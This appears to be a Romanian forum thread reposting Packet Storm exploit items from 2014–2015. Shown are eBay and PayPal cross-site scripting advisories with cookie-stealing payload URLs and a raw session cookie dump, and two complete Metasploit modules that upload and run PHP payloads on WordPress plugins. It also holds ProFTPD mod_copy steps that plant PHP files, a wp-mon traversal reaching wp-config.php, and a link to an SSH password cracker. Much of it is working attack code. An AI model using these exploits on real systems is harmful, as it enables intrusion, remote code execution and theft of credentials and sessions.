s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMokAEwAWUAAlMokAEjMgAGAAFTKJABMACoAAFTKHhdMQFKABhTKJABNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMokAExMjI1NjM3OTA2AO4AflMokAExBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiQAXRlc3RDb29raWUA9AAiUyiQASQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiQAWQwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnP60xMzk1MDc5MzUwOjAAPQAKUyiQATIwMTQua3Vuem3M/bEjO3QgStCZxGHoMG4FWaj2Rg**; nonsession=BAQAAAUSucEmyAAaAAEAAClUIcgEyMDE0Lmt1bnptAWQAA1UIcgEjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI1AAWM3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnRYkyMQFMABhVCHIBNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIcgE1MzI3M2RkMi4wLjEuMi4xMzYuMC4wLjIAEAAKVQhyATIwMTQua3Vuem0AMwAJVQhyATM0MTI4LERFVQDzACJVCHIBJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhyAW5ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIcgEwMDAwMDAwMYEG3noCCpfEtIJDQA4W2mCUvROF; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55087201^cguid/c77cfce61440a56b23d61f96fe2e024155087201^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIcgExMjI1NjM3OTA2LzA7Z/0uwdxIwLmpExj/Whb9VGXz2oM*; secses=BAQAAAUSucEmyAAaAAUsAGFUIcgE1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJdgCSPs+1ulBCbABPTM3Q2B4zn6g**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=D0F0865539CABCE246EB953E8860B953; ds2=asotr/b7qeZzzzzzzz^sotr/b7qeZzzzzzzz^] Connection[keep-alive] Response Header: rlogid[t6al%7Cwliodz%3F%3Cwk%7D1e37e*%3B27c-144d14de1b3-0x96] Content-Type[text/html;charset=utf-8] Content-Length[1201] Date[Mon, 17 Mar 2014 18:29:05 GMT] Server[eBay Server] Reference(s): http://www.ebay.com/businesspolicy/ http://www.bizpolicy.ebay.com/businesspolicy/return http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName= http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage http://www.bizpolicy.ebay.com/businesspolicy/manage?pageNumber=1&totalPages=1&context={%22status%22%3A%22success_edit_return%22} http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage http://www.bizpolicy.ebay.com/businesspolicy/ http://www.bizpolicy.ebay.com/businesspolicy/manage?totalPages=1 Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure encode and parse of the vulnerable policy name item list and activity log name list. Restrict the input field for special character and disallow wrong inputs by usage of a secure exception-handling to prevent exections. Security Risk: ============== The security risk of the persistent input validation web vulnerability in the policy name & activity-log module is estimated as medium. (CVSS 4.0) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright Š 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â? -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source: http://packetstorm.wowhacker.com/1504-exploits/VL-1228.txt

Document Title: =============== PayPal Inc Bug Bounty #113 - Client Side Cross Site Scripting Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1453 Video: http://www.vulnerability-lab.com/get_content.php?id=1454 View: https://www.youtube.com/watch?v=v5egy9V_Bs0 Release Date: ============= 2015-04-18 Vulnerability Laboratory ID (VL-ID): ==================================== 1453 Common Vulnerability Scoring System: ==================================== 3.4 Product & Service Introduction: =============================== PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract Advisory Information: ============================== An independent Vulnerability Laboratory researcher discovered a client-side cross site scripting web vulnerability in the official PayPal Inc online service web-application. Vulnerability Disclosure Timeline: ================================== 2014-12-30: Researcher Notification & Coordination (Milan A Solanki) 2014-12-31: Vendor Notification (PayPal Inc - Bug Bounty Team) 2015-01-08: Vendor Response/Feedback (PayPal Inc - Bug Bounty Team) 2015-01-15: Vendor Fix/Patch (PayPal Inc - Developer Team) 2015-04-18: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== PayPal Inc Product: PayPal - Online Service Web Application 2015 Q2 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A non persistent cross site scripting web vulnerability has been discovered in the official PayPal Inc online service web-application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions data by client-side manipulated cross site requests. The vulnerability is located in the `q` values of the merchant search module. Remote attackers are able to inject own script codes to the vulnerable GET method request of the merchant search module. The attack vector of the vulnerability is located on the client-side of the paypal online service web-application. The request method to inject the script code on client-side is `GET`. The injection point of the issue is the vulnerable `q` value in the search engine and the script code execution point is located in the results output context page. The security risk of the non-persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.4. Exploitation of the client-side cross site scripting web vulnerability requires low user interaction (click) and no privileged application user account. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] GET Vulnerable Service(s): [+] PayPal Inc (paypal.com) Vulnerable Module(s): [+] Merchant Search Vulnerable Parameter(s): [+] q Affected Section(s): [+] Merchant Search Results Proof of Concept (PoC): ======================= The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account and with low user interaction (click). For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Example https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=[CROSS SITE SCRIPTING VULNERABILITY!] PoC: Payload(s) https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Cimg%20src=x%20onerror=prompt%28document.domain%29%3E https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q=%22%3E%3Ciframe%20src=x%20onerror=prompt%28document.cookie%29%3E Reference(s): https://www.paypal.com/directory/merchants?q=directory/merchants?q= https://www.paypal.com/directory/merchants?q=directory/merchants?q=&q=q=directory/merchants?q=&q= Solution - Fix & Patch: ======================= 2015-01-15: Vendor Fix/Patch (PayPal Inc - Developer Team) Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the `q` merchant search value is estimated as medium. (CVSS 3.4) Credits & Authors: ================== Milan A Solanki - (milans812@gmail.com) [www.safehacking4mas.blogspot.in] Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright Š 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â? -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source: http://packetstorm.wowhacker.com/1504-exploits/VL-1453.txt

Update 2.77 Download: MIMEDefang Email Scanner 2.77 ? Packet Storm

Bun venit tinere, sper ca nu esti aici pentru hackuri de jocuri si contulete filelist, ci pentru a invata ceva. ( Un mic sfat , incearca sa nu folosesti multe emoticoane ).

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'Wordpress SlideShow Gallery Authenticated File Upload', 'Description' => %q{ The Wordpress SlideShow Gallery plugin contains an authenticated file upload vulnerability. We can upload arbitrary files to the upload folder, because the plugin also uses it's own file upload mechanism instead of the wordpress api it's possible to upload any file type. }, 'Author' => [ 'Jesus Ramirez Pichardo', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5460'], ['EDB', '34681'], ['WPVDB', '7532'] ], 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, 'Targets' => [['WP SlideShow Gallery 1.4.6', {}]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 28 2014')) register_options( [ OptString.new('WP_USER', [true, 'A valid username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class) end def user datastore['WP_USER'] end def password datastore['WP_PASSWORD'] end def check check_plugin_version_from_readme('slideshow-gallery', '1.4.7') end def exploit print_status("#{peer} - Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? print_error("#{peer} - Unable to login as #{user}") return end print_status("#{peer} - Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new data.add_part("", nil, nil, 'form-data; name="Slide[id]"') data.add_part("", nil, nil, 'form-data; name="Slide[link]"') data.add_part("", nil, nil, 'form-data; name="Slide[image_url]"') data.add_part('both', nil, nil, 'form-data; name="Slide[showinfo]"') data.add_part('randonx', nil, nil, 'form-data; name="Slide[description]"') data.add_part('file', nil, nil, 'form-data; name="Slide[type]"') data.add_part('randonx', nil, nil, 'form-data; name="Slide[title]"') data.add_part('70', nil, nil, 'form-data; name="Slide[iopacity]"') data.add_part('N', nil, nil, 'form-data; name="Slide[uselink]"') data.add_part("", nil, nil, 'form-data; name="Slide[order]"') data.add_part('self', nil, nil, 'form-data; name="Slide[linktarget]"') data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s print_status("#{peer} - Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'vars_get' => { 'page' => 'slideshow-slides', 'method' => 'save' }, 'data' => post_data, 'cookie' => cookie }) if res if res.code == 200 register_files_for_cleanup(filename) else fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_slideshowgallery_upload.rb.txt

EN: This is a php script that uses a pre-defined set of possible passwords and tries them against a given ssh server. RO: Acesta este un script php care foloseste un set predefinit de posibile parole ?i le încearc? impotriva unui server ssh dat P.S dac? e am s? il testez ?i am s? revin cu mai multe informa?ii despre el. Download: Download: T35T-SSH Password Cracker / Scanner ? Packet Storm

Update to Maligno 2.1 Download: Maligno 2.1 ? Packet Storm Changes Clientgen now supports standalone script generation, without requiring Maligno server component for downloading a payload. Cookie support added. Payload parameter + ID can be provided via a cookie. Various other updates and improvements.

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress Work The Flow Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress Work The Flow plugin, version 2.5.2. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Claudio Viviani', # Vulnerability discovery 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '7883'], ['EDB', '36640'], ['URL', 'http://packetstormsecurity.com/files/131294/WordPress-Work-The-Flow-2.5.2-Shell-Upload.html'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Work The Flow 2.5.2', {}]], 'DisclosureDate' => 'Mar 14 2015', 'DefaultTarget' => 0) ) end def check check_plugin_version_from_readme('work-the-flow-file-upload', '2.5.4') end def exploit php_pagename = rand_text_alpha(8 + rand(8)) + '.php' data = Rex::MIME::Message.new data.add_part('upload', nil, nil, 'form-data; name="action"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files\"; filename=\"#{php_pagename}\"") post_data = data.to_s res = send_request_cgi({ 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'index.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data }) if res if res.code == 200 print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) ) end end Source: http://packetstorm.wowhacker.com/1504-exploits/wp_worktheflow_upload.rb.txt

Description TJ Saunders 2015-04-07 16:35:03 UTC Vadim Melihow reported a critical issue with proftpd installations that use the mod_copy module's SITE CPFR/SITE CPTO commands; mod_copy allows these commands to be used by *unauthenticated clients*: --------------------------------- Trying 80.150.216.115... Connected to 80.150.216.115. Escape character is '^]'. 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:80.150.216.115] site help 214-The following SITE commands are recognized (* =>'s unimplemented) 214-CPFR <sp> pathname 214-CPTO <sp> pathname 214-UTIME <sp> YYYYMMDDhhmm[ss] <sp> path 214-SYMLINK <sp> source <sp> destination 214-RMDIR <sp> path 214-MKDIR <sp> path 214-The following SITE extensions are recognized: 214-RATIO -- show all ratios in effect 214-QUOTA 214-HELP 214-CHGRP 214-CHMOD 214 Direct comments to root@www01a site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto /tmp/passwd.copy 250 Copy successful ----------------------------------------- He provides another, scarier example: ------------------------------ site cpfr /etc/passwd 350 File or directory exists, ready for destination name site cpto <?php phpinfo(); ?> 550 cpto: Permission denied site cpfr /proc/self/fd/3 350 File or directory exists, ready for destination name site cpto /var/www/test.php test.php now contains ---------------------- 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument 2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened. 2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied ----------------------- test.php contains contain correct php script "<?php phpinfo(); ?>" which can be run by the php interpreter Source: http://bugs.proftpd.org/show_bug.cgi?id=4169 Source: http://packetstorm.wowhacker.com/1504-exploits/proftpd135-filecopy.txt

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress wp-mon Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/wp-mon/ | [+] Download Link : https://downloads.wordpress.org/plugin/wp-mon.zip | [+] Tested on : Windows,Linux | | [+] Date : 2015-04-16 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php | | [+] Vulnerable Code : <?php header( 'Content-Type: ' . $_GET['type'] ); header( 'Content-Disposition: attachment; filename="' . $_GET['name'] . '"' ); readfile( $_GET['path'] . DIRECTORY_SEPARATOR . $_GET['name'] ); ?> | [+] http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=[File Address]&name=[File Name] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| Source: http://packetstorm.wowhacker.com/1504-exploits/wpmon-disclose.txt

Bun venit.

Bun venit , ?i spor la înv??at.